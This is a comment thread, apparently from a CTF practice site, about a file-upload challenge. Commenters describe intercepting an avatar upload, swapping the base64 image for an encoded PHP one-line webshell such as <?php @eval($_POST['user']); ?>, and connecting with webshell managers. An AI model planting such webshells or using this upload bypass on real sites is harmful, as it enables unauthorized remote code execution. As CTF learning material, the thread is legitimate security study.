用蚂剑连上后,我又试了很多次,好像是有些参数名(也就是所谓的密码)是不行的,测了‘cmd’死活不行,后面的>会不见,测试发现这个‘’<?php @eval($_POST['user']); ?>‘’可以,还有?前面是有一个空格的
头像上传那里,抓包,data%3Aimage%2Fphp%3Bbase64%2C%2F9j%2F后面的数据全删了,然后在自己加上编码过的一句话木马。jpeg要改成php
很经典的文件上传题目,点赞
头像上传,然后抓包修改,base64编码方式
好题目
后台上传图片存在任意文件上传漏洞,更改base64加密后的图片后缀名和内容(base64加密的一句话把结尾?>去掉,否则在后台base64解密>为空又有?会发生语句错误),再用蚁剑连
按照各种wp的方法试了好几次,但是都没有成功,用蚁剑不行,手动也不行,T^T,文件也显示上传成功了,为什么啊?
你是不是有报错,它好像会自动将php标签闭合的?>中的">"去掉,我蚁剑连接后发现php文件里只有个最后只有个?了,你直接不闭合就可以了,用这个<?php @eval($_POST['pass']);
冰蝎死活连不上
这头像好熟悉
什么玩意,木马上传成功后不能连接,能够正常访问到但一直是连接为空
师傅麻烦排查一下,是否出现了一句话木马构造错误的情况
菜刀不行用胶剑吧
...
评论
study123 3年前
举报
用蚂剑连上后,我又试了很多次,好像是有些参数名(也就是所谓的密码)是不行的,测了‘cmd’死活不行,后面的>会不见,测试发现这个‘’<?php @eval($_POST['user']); ?>‘’可以,还有?前面是有一个空格的
study123 3年前
举报
头像上传那里,抓包,data%3Aimage%2Fphp%3Bbase64%2C%2F9j%2F后面的数据全删了,然后在自己加上编码过的一句话木马。jpeg要改成php
kjdfklha 3年前
举报
很经典的文件上传题目,点赞
helloxy 3年前
举报
头像上传,然后抓包修改,base64编码方式
BATQQ 3年前
举报
好题目
onerm 3年前
举报
后台上传图片存在任意文件上传漏洞,更改base64加密后的图片后缀名和内容(base64加密的一句话把结尾?>去掉,否则在后台base64解密>为空又有?会发生语句错误),再用蚁剑连
pil10w 3年前
举报
按照各种wp的方法试了好几次,但是都没有成功,用蚁剑不行,手动也不行,T^T,文件也显示上传成功了,为什么啊?
kiki677 3年前
举报
你是不是有报错,它好像会自动将php标签闭合的?>中的">"去掉,我蚁剑连接后发现php文件里只有个最后只有个?了,你直接不闭合就可以了,用这个<?php @eval($_POST['pass']);
mantou 3年前
举报
冰蝎死活连不上
Restwlaq 1年前
举报
这头像好熟悉
EndlessShw 3年前
举报
什么玩意,木马上传成功后不能连接,能够正常访问到但一直是连接为空
Eas0n 3年前
举报
师傅麻烦排查一下,是否出现了一句话木马构造错误的情况
jjjc 3年前
举报
菜刀不行用胶剑吧